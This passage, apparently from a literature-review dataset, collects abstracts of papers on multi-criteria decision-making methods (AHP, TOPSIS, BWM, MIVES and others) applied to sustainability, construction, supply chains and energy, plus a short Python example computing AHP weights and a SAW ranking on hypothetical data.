The analysis shows that (1) the use of MCDM approaches for designing GSCs is a rather new but emerging research field, (2) most of the publications focus on production and distribution problems, and there are only a few inventory models with environmental considerations, (3) the majority of papers assume all data to be deterministic, (4) little attention has been given to minimisation of waste, (5) numerous indicators are used to account for eco-efficiency, indicating the lack of standards. This study, therefore, identifies the need for more multi-criteria models for real-life GSCs, especially with inclusion of uncertainty in parameters that are associated with GSCs. --- paper_title: Envisioning sustainability three-dimensionally paper_content: Abstract Sustainability has arisen as an alternative to the dominant socio-economic paradigm (DSP). However, it is still a difficult concept for many to fully understand. To help to communicate it and make it more tangible visual representations have been used. Three of the most used, and critiqued, sustainability representations are: (1) a Venn diagram, i.e. three circles that inter-connect, where the resulting overlap that represents sustainability can be misleading; (2) three concentric circles, the inner circle representing economic aspects, the middle social aspects, and the outer environmental aspects; and (3) the Planning Hexagon, showing the relationships among economy, environment, the individual, group norms, technical skills, and legal and planning systems. Each has been useful in helping to engage the general public and raising sustainability awareness. However, they all suffer from being highly anthropocentric, compartmentalised, and lacking completeness and continuity. These drawbacks have reduced their acceptance and use by more advanced sustainability scholars, researchers and practitioners. This paper presents an innovative attempt to represent sustainability in three dimensions which show the complex and dynamic equilibria among economic, environmental and social aspects, and the short-, long- and longer-term perspectives. --- paper_title: A Review of Multi-Criteria Assessment of the Social Sustainability of Infrastructures paper_content: Abstract Nowadays multi-criteria methods enable non-monetary aspects to be incorporated into the assessment of infrastructure sustainability. Yet evaluation of the social aspects is still neglected and the multi-criteria assessment of these social aspects is still an emerging topic. Therefore, the aim of this article is to review the current state of multi-criteria infrastructure assessment studies that include social aspects. The review includes an analysis of the social criteria, participation and assessment methods. The results identify mobility and access, safety and local development among the most frequent criteria. The Analytic Hierarchy Process and Simple Additive Weighting methods are the most frequently used. Treatments of equity, uncertainty, learning and consideration of the context, however, are not properly analyzed yet. Anyway, the methods for implementing the evaluation must guarantee the social effect on the result, improvement of the representation of the social context and techniques to facilitate the evaluation in the absence of information. 
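As the review above identifies the Analytic Hierarchy Process (AHP) and Simple Additive Weighting (SAW) as the most frequently used methods, the following sketch shows the usual computation: criteria weights from the principal eigenvector of a pairwise-comparison matrix, a consistency check, and a SAW ranking. The comparison matrix and decision matrix are hypothetical and do not come from any of the cited studies.

```python
# AHP weights (principal eigenvector) and SAW ranking on hypothetical data.
import numpy as np

# Pairwise comparison of three criteria, e.g. mobility/access, safety, local development.
A = np.array([[1.0, 3.0, 5.0],
              [1.0 / 3.0, 1.0, 2.0],
              [1.0 / 5.0, 1.0 / 2.0, 1.0]])

eigvals, eigvecs = np.linalg.eig(A)
k = np.argmax(eigvals.real)                 # principal eigenvalue of the reciprocal matrix
w = np.abs(eigvecs[:, k].real)
w = w / w.sum()                             # AHP criteria weights

CI = (eigvals[k].real - len(A)) / (len(A) - 1)
CR = CI / 0.58                              # Saaty's random index RI = 0.58 for a 3x3 matrix

# Decision matrix: rows = alternatives, columns = benefit-type criteria (hypothetical scores).
D = np.array([[70.0, 0.8, 3.0],
              [55.0, 0.9, 4.0],
              [80.0, 0.6, 2.0]])
D_norm = D / D.max(axis=0)                  # linear (max) normalisation for benefit criteria
scores = D_norm @ w                         # SAW aggregate score per alternative

print("weights:", np.round(w, 3), "consistency ratio:", round(CR, 3))
print("ranking (best first):", np.argsort(-scores))
```

A consistency ratio below about 0.1 is conventionally taken to mean the pairwise judgements are acceptably consistent.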
--- paper_title: Using fuzzy multiple criteria decision making approaches for evaluating energy saving technologies and solutions in five star hotels: A new hierarchical framework paper_content: The purpose of this study is to present a hierarchical framework for evaluating and ranking the important key energy-saving technologies and solutions in the 10 biggest Iranian hotels through integrating fuzzy set theory, as well as qualitative and quantitative approaches. The important key energy factors for the evaluation of energy saving technologies and solutions are gathered through a literature survey. This paper proposes a framework based on the fuzzy Delphi method and fuzzy multiple criteria decision-making, including the fuzzy analytic hierarchy process and the fuzzy technique for order performance by similarity to ideal solution. In the fuzzy Delphi method step of the study, 17 key energy factors were selected from among a total of 40 energy factors and categorised into five groups. The fuzzy analytic hierarchy process was used for the ranking of the 17 key energy factors, and the fuzzy technique for order performance by similarity to ideal solution was employed for ranking the 10 biggest Iranian hotels in different provinces. The results of this study revealed that, among the main groups, equipment efficiency (0.403) ranked first, system efficiency (0.225) second, reduction of heating and cooling demands (0.151) third, and energy management (0.091) and renewable energy (0.083) fourth and fifth, respectively. In the ranking weights of the 17 sub-groups of energy saving technologies and solutions, the results of the fuzzy analytic hierarchy process showed that efficient solutions for active space cooling (0.662) ranked first, building insulation (0.541) second and the European Eco-label for tourist accommodation service (0.532) third. --- paper_title: A supplier selection life cycle approach integrating traditional and environmental criteria using the best worst method paper_content: Abstract Supplier selection is a strategic decision that significantly influences a firm's competitive advantage. The importance of this decision is amplified when a firm seeks new markets and potentially a new supplier base. Recognizing the importance of these decisions, an innovative three-phase supplier selection methodology including pre-selection, selection, and aggregation is proposed. Conjunctive screening is used for pre-selection; the best worst method (BWM), a novel multiple criteria decision-making method, is introduced for the selection phase. Material price and annual quantity are integrated with the decision at the aggregation phase. Qualitative, quantitative, traditional business, and environmental criteria are incorporated. The proposed methodology is applied within a food supply chain context, the edible oils industry. In this illustration the focal organization faces a global entry decision in a new international market. An extensive search is completed to identify the potential suppliers. Through initial screening a sub-set of qualified suppliers is identified. BWM is then used to find the best suppliers from among the qualified suppliers. Eventually the significance of the supplies in the aggregation phase is determined. The outcome is a relatively meaningful ranking of suppliers. The paper provides insights into the methodology, decision, and managerial implications.
Study and model limitations, along with future research directions are described. --- paper_title: The Multi-Aspect Criterion in the PMADM Outline and Its Possible Application to Sustainability Assessment paper_content: Over the past few centuries, the process of decision-making has become more complicated in different respects. Since the initial phase of Multiple Criteria Decision Making (MCDM) around fifty years ago, Multiple Attribute Decision Making (MADM) has continued developing over the years as a sub-concept of MCDM. Noticeably, the importance of the decision-making process is increasingly expanding to such an extent that it necessarily blends into the undeniable processes of MADM actual models. Novel methods with different perspectives have been introduced considering the dynamic MADM concepts of time and future in classical frameworks; however, they do not overcome challenges in practice. Recently, Prospective MADM (PMADM) as a specific approach has presented future-oriented models using already known approaches of MCDM, and it has innovative items which show barriers of classic model of MADM. However, PMADM practically needs more conceptual bases to illustrate and plan the future of real decision-making problems. The Multi-Aspect Criterion is a new concept in mapping the future of the PMADM outline. In this regard, two examples of sustainability will be analyzed, and different requirements and aspects associated with PMADM will be discussed in this study. This new approach can support the PMADM outline in more detail and deal with a decision-making structure that can be considered as novel to industry experts. --- paper_title: Application of Structural Equation Modeling (SEM) to solve environmental sustainability problems: a comprehensive review and meta-analysis paper_content: Most methodological areas assume common serious reflections to certify difficult study and publication practices, and, therefore, approval in their area. Interestingly, relatively little attention has been paid to reviewing the application of Structural Equation Modeling (SEM) in environmental sustainability problems despite the growing number of publications in the past two decades. Therefore, the main objective of this study is to fill this gap by conducting a wide search in two main databases including Web of Science and Scopus to identify the studies which used SEM techniques in the period from 2005 to 2016. A critical analysis of these articles addresses some important key issues. On the basis of our results, we present comprehensive guidelines to help researchers avoid general pitfalls in using SEM. The results of this review are important and will help researchers to better develop research models based on SEM in the area of environmental sustainability. --- paper_title: NORMALIZED WEIGHTED GEOMETRIC BONFERRONI MEAN OPERATOR OF INTERVAL ROUGH NUMBERS – APPLICATION IN INTERVAL ROUGH DEMATEL-COPRAS paper_content: This paper presents a new approach to the treatment of uncertainty and imprecision in multi-criteria decision-making based on interval rough numbers (IRN). The IRN-based approach provides decision-making using only internal knowledge for the data and operational information of a decision-maker. A new normalized weighted geometric Bonferroni mean operator is developed on the basis of the IRN for the aggregation of the IRN (IRNWGBM). 
Testing of the IRNWGBM operator is performed through the application in a hybrid IR-DEMATEL-COPRAS multi-criteria model which is tested on real case of selection of optimal direction for the creation of a temporary military route. The first part of hybrid model is the IRN DEMATEL model, which provides objective expert evaluation of criteria under the conditions of uncertainty and imprecision. In the second part of the model, the evaluation is carried out using the new interval rough COPRAS technique. --- paper_title: An Overview of Multi-Criteria Decision-Making Methods in Dealing with Sustainable Energy Development Issues paper_content: The measurement of sustainability is actively used today as one of the main preventative instruments in order to reduce the decline of the environment. Sustainable decision-making in solving energy issues can be supported and contradictory effects can be evaluated by scientific achievements of multi-criteria decision-making (MCDM) techniques. The main goal of this paper is to overview the application of decision-making methods in dealing with sustainable energy development issues. In this study, 105 published papers from the Web of Science Core Collection (WSCC) database are selected and reviewed, from 2004 to 2017, related to energy sustainability issues and MCDM methods. All the selected papers were categorized into 9 fields by the application area and into 10 fields by the used method. After the categorization of the scientific articles and detailed analysis, SWOT analysis of MCDM approaches in dealing with sustainable energy development issues is provided. The widespread application and use of MCDM methods confirm that MCDM methods can help decision-makers in solving energy sustainability problems and are highly popular and used in practice. --- paper_title: Factors influencing consumers' intention to return the end of life electronic products through reverse supply chain management for reuse, repair and recycling paper_content: Resource depletion, population growth and environmental problems force companies to collect their end of life (EOL) products for reuse, recycle and refurbishment through reverse supply chain management (RSCM). Success in collecting the EOL products through RSCM depends on the customers’ participation intention. The objectives of this study are: (1) To examine the important factors influencing customers’ attitude to participate in RSCM; (2) To examine the important factors influencing customers’ subjective norm to participate in RSCM; (3) To examine the main factors influencing customers’ perceived behavioral control to participate in RSCM; (4) To examine the influence of attitude, subjective norms and perceived behavioral control on customers’ participation intention in RSCM. The Decomposed Theory of Planned Behaviour (DTPB) has been chosen as the underpinning theory for this research. The research conducted employed the quantitative approach. Non-probability (convenience sampling) method was used to determine the sample and data was collected using questionnaires. Partial Least Squares-Structural Equation Modeling (PLS-SEM) technique was employed. A total of 800 questionnaires were distributed among customers of electronic products in Malaysia. Finally, the questionnaire was distributed among the customers in electronic retailer companies based on convenience sampling method. 
The empirical results confirm that consumers' perception of the risk associated with EOL electronic products, consumers' ecological knowledge and the relative advantages associated with reuse, repair and recycling can influence the attitude of consumers towards returning EOL products to the producer for reuse, repair and recycling. --- paper_title: How to understand and measure environmental sustainability: Indicators and targets paper_content: Abstract The concept of sustainable development from 1980 to the present has evolved into definitions of the three pillars of sustainability (social, economic and environmental). The recent economic and financial crisis has helped to newly define economic sustainability. It has brought into focus the economic pillar and cast a question mark over the sustainability of development based on economic progress. This means fully addressing the economic issues on their own merits with no apparent connection to the environmental aspects. Environmental sustainability is correctly defined by focusing on its biogeophysical aspects. This means maintaining or improving the integrity of the Earth's life supporting systems. The concept of sustainable development and its three pillars has evolved from a rather vague and mostly qualitative notion to more precise specifications defined many times over in quantitative terms. Hence the need for a wide array of indicators is very clear. The paper analyses the different approaches and types of indicators developed which are used for the assessment of environmental sustainability. One important aspect here is setting targets and then “measuring” the distance to a target to get the appropriate information on the current state or trend. --- paper_title: Preparing future engineers for challenges of the 21st century: Sustainable engineering paper_content: Abstract The field of engineering is changing rapidly as the growing global population puts added demands on the earth's resources: engineering decisions must now account for limitations in materials and energy as well as the need to reduce discharges of wastes. This means educators must revise courses and curricula so engineering graduates are prepared for the new challenges as practicing engineers. The Center for Sustainable Engineering has been established to help faculty members accommodate such changes through workshops and new educational materials, including a free access website with peer-reviewed materials. --- paper_title: Uncertainty analysis in the sustainable design of concrete structures: A probabilistic method paper_content: Abstract This paper presents a sustainability assessment model based on requirement trees, value analysis, the Analytic Hierarchy Process, and the Monte Carlo simulation technique. It embraces the approach for assessing sustainability taken by the Spanish Structural Concrete Code. Nevertheless, the deterministic model of the Spanish Code can cause significant problems in terms of adequately managing a project’s structural sustainability objective. Thus, a method not only has to assess the potential sustainability index at the end of the project. It also has to evaluate the degree of uncertainty that may make it difficult to achieve the sustainability objective established by the client or promoter. --- paper_title: The Location Selection for Roundabout Construction Using Rough BWM-Rough WASPAS Approach Based on a New Rough Hamy Aggregator paper_content: An adequately functionally located traffic infrastructure is an important factor in the mobility of people because it affects the quality of traffic, safety and efficiency of carrying out transportation activities. Locating a roundabout on an urban network is an imperative for road engineering to address traffic problems such as reduction of traffic congestion, enhancement of security and sustainability, etc. Therefore, this paper evaluates potential locations for roundabout construction using Rough BWM (Best Worst Method) and Rough WASPAS (Weighted Aggregated Sum Product Assessment) models. Determination of relative criterion weights on the basis of which the potential locations were evaluated was carried out using the Rough BWM method. In this paper, in order to enable the most precise consensus for group decision-making, a Rough Hamy aggregator has been developed. The main advantage of the Hamy mean (HM) operator is that it can capture the interrelationships among multi-input arguments and can provide DMs more options. Until now, there is no research based on HM operator for aggregating imprecise and uncertain information. The obtained indicators are described through eight alternatives. The results show that the fifth and sixth alternatives are the locations that should have a priority in the construction of roundabouts from the perspective of sustainable development, which is confirmed throughout changes of parameter k and with comparing to other methods in the sensitivity analysis. --- paper_title: Rank of green building material criteria based on the three pillars of sustainability using the hybrid multi criteria decision making method paper_content: Abstract A green building material (GBM) is an ecological, health-promoting, recycled, or high-performance building material that impacts the material selection to cover all three pillars (3Ps) of sustainability.
The absence of clear instructions for GBMs and the difficulty of precision adjustments of GBM criteria with 3Ps sustainability make GBM selection a challenge. In addition, the consideration of all sustainability factors in GBM selection is a multi-criteria decision problem that requires mathematical techniques such as the multi criteria decision making (MCDM) method. This study applies a hybrid MCDM methodology to resolve multiple incompatible and conflicting GBM criteria to align with 3Ps sustainability. The Decision-Making Trial and Evaluation Laboratory (DEMATEL) was used to analyze the efficacy of and interrelationship between GBM criteria. This tool is a hybrid model using fuzzy analytic network process (FANP) for aligning and ranking GBM criteria based on 3Ps sustainability. Additionally, the study inspects four groups of professionals in Malaysia who involved in GBM selection and modified one of the oldest GBM criteria models considering the criteria identified from a comprehensive literature review. The results show that the relationship between GBMs and sustainability criteria are different based on the separate 3Ps of sustainability. The evaluation and results provide a valuable reference for building professionals to enhance sustainable construction through green materials. --- paper_title: Integrated sustainability assessment method applied to structural concrete columns paper_content: Abstract This research paper presents a general model for integral sustainability analysis of columns. This assessment tool has been obtained by using MIVES, a Multi-Criteria Decision Making (MCDM) model which considers the sustainability main plans (economic, environmental and social) and incorporates a value function concept in order to homogenize the indicators and consider the degree of satisfaction. This tool is general and could be applied to assess other structural components within the building sector after introducing minor changes. Nevertheless, for this research project, it has been designed to assess reinforced concrete columns in buildings in situ. Therefore, the influence of determining variables such as concrete compressive strength, cross-section geometry and building process have been studied based on this defined model. --- paper_title: Life cycle sustainability assessment (LCSA) for selection of sewer pipe materials paper_content: Sewer systems, over their life cycle, suffer deterioration due to aging, aggressive environmental factors, increased demand, inadequate design, third party intervention, and improper operation and maintenance activities. As a result, their state and overall long-term performance can be affected, which often requires costly and extensive maintenance, repair, and rehabilitation. Furthermore, these pressures can enhance the risk of failures (e.g., sewer leakage) which in turn can have serious impacts on the environment, public safety and health, economics, and the remaining service life of these assets. Effective asset management plans must be implemented to address long-term sustainability principles, i.e., economic growth, human health and safety, and environmental protection, simultaneously. The aim of this paper is to evaluate and compare four typical sewer pipe materials [i.e., concrete, polyvinyl chloride (PVC), vitrified clay, and ductile iron] and identify sustainable solutions. Two comprehensive life cycle sustainability assessment (LCSA) frameworks were applied. 
The first LCSA framework was based on the integration of emergy synthesis, life cycle assessment (LCA), and life cycle costing (LCC). In this framework, emergy synthesis has been applied to integrate the results from environmental analysis (i.e., LCA) and economic analysis (i.e., LCC) to an equivalent form of solar energy: a solar emergy joule. The second LCSA framework was based on a conventional, multi-criteria decision-making technique, i.e., the analytical hierarchy process, to integrate the results from environmental analysis (i.e., LCA) and economic analysis (i.e., LCC) and find the most sustainable solution over the sewer pipe life cycle. The results demonstrate that PVC pipe is the most sustainable option from both environmental and economic view points and can ensure a more sustainable sewer system. --- paper_title: Analyzing procurement route selection for electric power plants projects using SMART paper_content: AbstractThe decision of selecting the appropriate procurement/delivery system for large investment construction projects is a critical and challenging task for clients, and therefore a significant factor for the project's success. Complex projects as electric power plants can involve managing multiple contracts or subcontracts simultaneously or in sequence. The aim of this paper is to develop, and analyze a decision support tool to select the most efficient procurement/delivery system for multiple contracts Combined Cycle Power Plants (CCPP) constructed in Egypt and funded by the publicsector. This process involved the identification of various procurement routes, followed by the utilization of quantitative values developed in accordance with the requirements of the multi-criteria decision analysis technique known as simple multi-attribute rating technique (SMART). Results revealed that the procurement/delivery system with the highest score, for all contractual packages, is the integrated project delivery... --- paper_title: A multi-objective decision-support model for selecting environmentally conscious highway construction methods paper_content: AbstractThe construction industry has a considerable share in overall resource and energy consumption. Consequently, decision-makers try to achieve environmentally conscious construction by integrating environmental objectives into the selection of construction elements. Due to the complexity of construction projects, it is a known challenge to provide an effective mechanism to select the most feasible construction methods. Thus, it is crucial to learn the interdependency between various resource alternatives, such as material and equipment type, under various project conditions like unavailability of resources. An analytic network process (ANP) was used in this study to construct a decision model for selecting the most feasible construction method. Data collected via interviews with highway construction experts were used to model the dependency between decision parameters, such as project conditions and resource performance indicators. The proposed ANP model output the relative importance weights of deci... --- paper_title: MIVES multi-criteria approach for the evaluation, prioritization, and selection of public investment projects. A case study in the city of Barcelona paper_content: A meaningful contribution to the evaluation of heterogeneous public investments is described in this article. 
The proposed methodology provides a step towards sustainable urban planning in which decisions are taken according to clear, consistent and transparent criteria assisted by the MIVES multi-criteria analysis framework. The MIVES methodology combines multi-criteria decision making (MCDM) and multi-attribute utility theory (MAUT), incorporating the value function (VF) concept and assigning weights through the analytic hierarchy process (AHP). First, a homogenization coefficient is calculated to develop the Prioritization Index for Heterogeneous Urban Investments (PIHUI), so that non-homogenous alternatives may be comparable. This coefficient measures the need of society to invest in each public project through the consideration of its contribution to the regional balance, the scope of its investment, the evaluation of the current situation and the values of the city. Then, the MIVES multi-criteria framework is used to evaluate the degree to which each investment would contribute to sustainable development. Different economic, environmental and social aspects were considered through a decision framework, constructed with the three aforementioned requirements, five criteria and eight indicators. The case study conducted for the Ecology, Urban Planning and Mobility Area of Barcelona municipal council is presented in this article, showing how this method performs accurate, consistent, and repeatable evaluations. --- paper_title: Sustainability Evaluation Framework of Urban Stormwater Drainage Options for Arid Environments Using Hydraulic Modeling and Multicriteria Decision-Making paper_content: Stormwater drainage systems in urban areas located in arid environmental regions generally consist of storm-sewer networks and man-made ponds for the collection and disposal of runoff, respectively. Due to expansion in cities’ boundaries as a result of population growth, the capacity of existing drainage systems has been exhausted. Therefore, such systems overflow even during the smaller (than the design) return period floods. At the same time, changing rainfall patterns and flash floods due to climate change are other phenomena that need appropriate attention. Consequently, the municipalities in arid environmental regions are facing challenges for effective decision-making concerning (i) improvement needs for drainage networks for safe collection of stormwater, (ii) selection of most feasible locations for additional ponds, and (iii) evaluation of other suitable options, such as micro-tunneling. In this research, a framework has been developed to evaluate different stormwater drainage options for urban areas of arid regions. Rainfall-runoff modeling was performed with the help of Hydrological-Engineering-Centre, Hydrological-Modelling-System (HEC-HMS). To evaluate the efficacy of each option for handling a given design flood, hydraulic-modeling was performed using SewerGEMS. Meteorological and topographical data was gathered from the Municipality of Buraydah and processed to generate different inputs required for hydraulic modeling. Finally, multicriteria decision-making (MCDM) was performed to evaluate all the options on the basis of four sustainability criteria, i.e., flood risk, economic viability, environmental impacts, and technical constraints. Criteria weights were established through group decision-making using the Analytic Hierarchy Process (AHP). Preference-Ranking-Organization-Method for Enrichment-Evaluation (PROMETHEE II) was used for final ranking of stormwater drainage options. 
The proposed framework has been implemented on a case of Buraydah City, Qassim, Saudi Arabia, to evaluate its pragmatism. Micro-tunnelling was found to be the most sustainable option. --- paper_title: Experimental and analytical selection of sustainable recycled concrete with ceramic waste aggregate paper_content: Abstract This experimental and analytical investigation is conducted to develop a sustainable recycled concrete by incorporating ceramic waste as coarse aggregate. In order to achieve the designed goal, conventional aggregate is replaced by different amounts of ceramic waste aggregate. Fresh and hardened properties of conventional as well as ceramic waste aggregate concrete are assessed. Environmental impacts are also considered in terms of CO 2 footprints and consumption of volume of raw materials by concrete. Interfacial model is proposed at micro level to evaluate the behavior of ceramic waste and conventional aggregate with hydrated cement paste. Finally, sustainable concrete is selected which has the best performance with respect to compressive strength and environmental impacts. It is concluded that 30% partial replacement of ceramic waste aggregate with conventional aggregate provides the highest compressive strength, less environmental impacts and is selected as sustainable concrete, which is also verified by analytical hierarchy process (AHP) and technique for order preference by similarity to ideal solution (TOPSIS) --- paper_title: Industrial building design stage based on a system approach to their environmental sustainability paper_content: Abstract It is well known how the construction sector wields an enormous influence over economic activity, employment and growth rates. Further consideration still needs to be given to sustainability. Accordingly, an Integrated Value Model for Sustainable Assessment is presented in this article that applies a set of six study scopes to define the sustainability criteria of industrial buildings. Assignment of value functions to the sustainability criteria is then described in the context of a case study of a printing works, which demonstrates the effectiveness of this model at unifying both qualitative and quantitative indicators, in order to arrive at a specific “environmental sustainability index” for the industrial building. --- paper_title: Sustainability based-approach to determine the concrete type and reinforcement configuration of TBM tunnels linings. Case study: Extension line to Barcelona Airport T1 paper_content: Fibre-reinforced concrete (FRC) is a suitable alternative to the traditional reinforced concrete used in the manufacture of precast segments used to line tunnels excavated with a tunnel boring machine (TBM). Moreover, its use as a structural material has been approved by several national codes and by the current fib Model Code (2010). The use of FRC in segmental linings confers several technical and economic advantages, evidenced by the fact that structural fibres have been used to partially or entirely replace reinforcing bars in many TBM tunnels built over the past 20 years or currently under construction. FRC could also have been used in other tunnels, which are currently in the planning stage or under construction. However, despite its technical suitability and approval in current codes, the use of FRC was not possible in some cases. 
The impediment has sometimes been an incomplete understanding of the structural behaviour of the material, but a more general motive has been that comparisons of materials have taken into account only direct material costs and have not considered indirect costs or social and environmental factors. The aim of the present research is to develop a method for analysing the sustainability of different concrete and reinforcement configurations for segmental linings of TBM tunnels using the MIVES method (a multi-criteria decision making approach for assessing sustainability). This MCDM method allows minimising subjectivity in decision making while integrating economic, environmental and social factors. The model has been used to assess the sustainability of different alternatives proposed for manufacturing the segmental tunnel lining for the extension of the rail line of Ferrocarrils de la Generalitat de Catalunya (FGC) to Terminal 1 of El Prat Airport in Barcelona. --- paper_title: Multi-criteria evaluation model for the selection of sustainable materials for building projects paper_content: Sustainable material selection represents an important strategy in building design. Current building materials selection methods fail to provide adequate solutions for two major issues: assessment based on sustainability principles, and the process of prioritizing and assigning weights to relevant assessment criteria. This paper proposes a building material selection model based on the fuzzy extended analytical hierarchy process (FEAHP) techniques, with a view to providing solutions for these two issues. Assessment criteria are identified based on sustainable triple bottom line (TBL) approach and the need of building stakeholders. A questionnaire survey of building experts is conducted to assess the relative importance of the criteria and aggregate them into six independent assessment factors. The FEAHP is used to prioritize and assign important weightings for the identified criteria. A numerical example, illustrating the implementation of the model is given. The proposed model provides guidance to building designers in selecting sustainable building materials. --- paper_title: Multiple Criteria Decision Support System for Assessment of Projects Managers in Construction paper_content: Construction processes planning and effective management are extremely important for success in construction business. Head of a design must be well experienced in initiating, planning, and executing of construction projects. Therefore, proper assessment of design projects' managers is a vital part of construction process. The paper deals with an effective methodology that might serve as a decision support aid in assessing project managers. Project managers' different characteristics are considered to be more or less important for the effective management of the project. Qualifying of managers is based on laws in force and sustainability of project management involving determination of attributes value and weights by applying analytic hierarchy process (AHP) and expert judgement methods. For managers' assessment and decision supporting is used additive ratio assessment method (ARAS). The model, presented in this study, shows that the three different methods combined (ARAS method aggregated together with the AHP method and the expert judgement method) is an effective tool for multiple criteria decision aiding. 
As a tool for the assessment of the developed model, a multiple criteria decision support system (MCDSS), the weighting and assessment of ratios (WEAR) software, was developed. The solution results show that the created model, the selected methods and MCDSS WEAR can be applied in practice as an effective decision aid. --- paper_title: Construction method selection for green building projects to improve environmental sustainability by using an MCDM approach paper_content: Environmental pollution is a challenge being faced by construction companies. They attempt to solve these problems in order to improve the environmental sustainability of their green building projects by using different construction methods. However, the selection of the construction method for building projects involves a complex decision-making process. To solve this problem of construction method selection, this investigation presents a Multiple Criteria Decision Making (MCDM) approach. The study yields a comprehensive and systematic structure that employs quantitative assessments for priority construction method selection for each green building project and also aids construction companies with regard to their practical application. --- paper_title: Remedial Modelling of Steel Bridges through Application of Analytical Hierarchy Process (AHP) paper_content: The deterioration and failure of steel bridges around the world is of growing concern for asset managers and bridge engineers due to aging, increasing volume of traffic and introduction of heavier vehicles. Hence, a model that considers these heuristics can be employed to validate or challenge the practical engineering decisions. Moreover, in a time of increased litigation and economic unrest, engineers require a means of accountability to support their decisions. Maintenance, Repair and Rehabilitation (MR&R) of deteriorating bridge structures are considered as expensive actions for transportation agencies, and the cost of error in decision making may aggravate problems related to the infrastructure funding system. The subjective nature of decision making in this field could be replaced by the application of a Decision Support System (DSS) that supports asset managers through balanced consideration of multiple criteria. The main aim of this paper is to present the developed decision support system for asset management of steel bridges within acceptable limits of safety, functionality and sustainability. The Simplified Analytical Hierarchy Process (S-AHP) is applied as a multi criteria decision making technique. The model can serve as an integrated learning tool for novice engineers, or as an accountability tool for assurance to project stakeholders. --- paper_title: Evaluation of the requirement for passenger car parking spaces using multi-criteria methods paper_content: Abstract The present situation shows that the parking infrastructure in residential areas of Vilnius does not satisfy the existing level of motorization. Every evening people come home from work and end up parking cars on lawns, cycle and pedestrian paths, playgrounds, fire accesses, etc. In Lithuania, this problem emerged with the growing number of cars. There have been attempts to address parking shortage issues 20–30 years ago by building metal above-ground garages and underground car parks; but such solutions focused on existing burning needs alone. As a result, the current parking situation in residential areas is chaotic.
This problem stems from the ineffectiveness of responsible institutions, which maintain the status quo. Consequently – as no car parking development projects are planned and implemented as well as no required statistical data is collected regarding conditions of car parking and etc. – people are forced to look for a solution by themselves, thus end up parking on lawns or playgro... --- paper_title: On the selection by MCDM methods of the optimal system for seismic retrofitting and vertical addition of existing buildings paper_content: Seismic retrofitting and vertical addition of existing buildings have been investigated.Different alternatives have been proposed for the two structural modification interventions.The TOPSIS MCDM method has been used for selecting the best alternative.Sensitivity analyses have proved the objectivity of the solutions found. In the current paper a novel procedure to select the optimal solution both for seismic retrofitting of existing RC buildings and for super-elevation of existing masonry constructions has been implemented by using three different Multi-Criteria Decision Making (MCDM) (TOPSIS, ELECTRE and VIKOR) methods.The procedure application has been faced with reference to two case studies.The first intervention has been studied on a real full-scale 3D RC structure retrofitted with different seismic protection devices mainly based on metal materials, whose performances were experimentally evaluated in a previous research project. All the applied MCDM methods have provided the same result, that is the dominating role exerted by aluminium shear panels for seismic retrofitting of the analysed structure.On the other hand, different innovative and traditional constructive systems have been examined to increase the number of floors of existing masonry buildings. The effectiveness of these interventions in improving the base building behaviour has been proved on a typical building of the South Italy. The study results, achieved by using the three MCDM methods inspected, have provided as an optimal solution the cold-formed steel systems thanks to their prerequisites of lightness, economy and sustainability. --- paper_title: Sustainability assessment for recreational buildings paper_content: ABSTRACTA large amount of natural resources and energy is wasted during and after the building construction process which might cause environmental problems such as climate changes. In order to achieve higher standards of environmental protection a range of building assessment systems has been established. However, they are mostly connected with the efficiency of an environmental protection and consumption of resources. Only few of them have limited possibilities to assess social and economic sustainability. A sustainable building includes aspects of environment, economy and society and therefore requirements to its assessment systems should be complex. We suggest that sustainability principles, that is, environmental, social and economic sustainability, should be estimated in the same equal weightings. The authors of this article created a model for assessing the sustainability for recreational buildings. Our model was created, in collaboration with experts, using breakdown, compensation and the analytic... --- paper_title: Upgrading the old vernacular building to contemporary norms: multiple criteria approach paper_content: AbstractSustainable development is emphasized in the process of construction or modernization of buildings at present. 
Old vernacular architecture does not satisfy contemporary building norms such as daylighting and/or thermal performance parameters. These parameters are important for sustainability due to their relation with energy savings. It is obvious that seeking to improve these parameters, old buildings should be upgraded. The main problem is how to reach contemporary building norms without a negative impact to architectural heritage in a process of modernisation. The aim of the research is to find the best compromise solution for effective vernacular architecture's change. The Authors suggest using multiple criteria approach that enables to evaluate possible alternative solutions in several controversial aspects and to find rational building's modernisation type. Also, suitability of combination of usual MCDM (Multiple Criteria Decision Making) methods with grey systems theory due to possibility o... --- paper_title: Cold-formed thin-walled steel structures as vertical addition and energetic retrofitting systems of existing masonry buildings paper_content: According to the current trend for sustainable constructions in urban areas, the present paper deals with the analysis of vertical addition systems for energetic retrofitting of existing masonry buildings. Starting from the current European (EN 1998-3:2005) and Italian (NTC 08) technical codes for the seismic assessment of existing structures, first a FEM model has been implemented to investigate the structural performances of masonry units with variable storeys (1, 2 and 3) and material strength (fk = 1, 3 and 6 MPa). Later on, traditional (reinforced concrete, masonry and steel) and innovative (glued laminated timber and cold-formed thin-walled steel) technologies have been proposed as a solution for vertical addition of the studied buildings. Therefore, a numerical campaign of linear dynamic analyses has been undertaken on the examined structures aiming at selecting the best vertical addition solution. The achieved numerical analysis results have provided cold-formed steel systems as the dominant solut... --- paper_title: Improving organizational learning by sharing information through innovative supply chain in agro-food companies from Bosnia and Herzegovina paper_content: Innovation is essential for long-term success in business and companies need to develop an innovative supply chain to respond to environmental and market challenges. It is necessary to develop knowledge through organizational learning in order to strengthen the ability of companies to innovate. An innovative supply chain is the basis for developing innovation in companies. To improve its market position companies should continuously receive high quality information from participants in the supply chain by sharing information. The complexity of relationships within supply chain affecting organizational learning is the subject of this study. We conducted an empirical study focusing our attention on agro-food companies in Bosnia and Herzegovina. A questionnaire was used as a data collection tool applying random systematic sampling and a total of 159 companies took part in this study. The empirical findings showed that sharing of information has a significant linkage with an innovative supply chain, but only in establishing partnerships with customers. We confirmed that an innovative supply chain is essential for development of organizational learning and agile supply chain. 
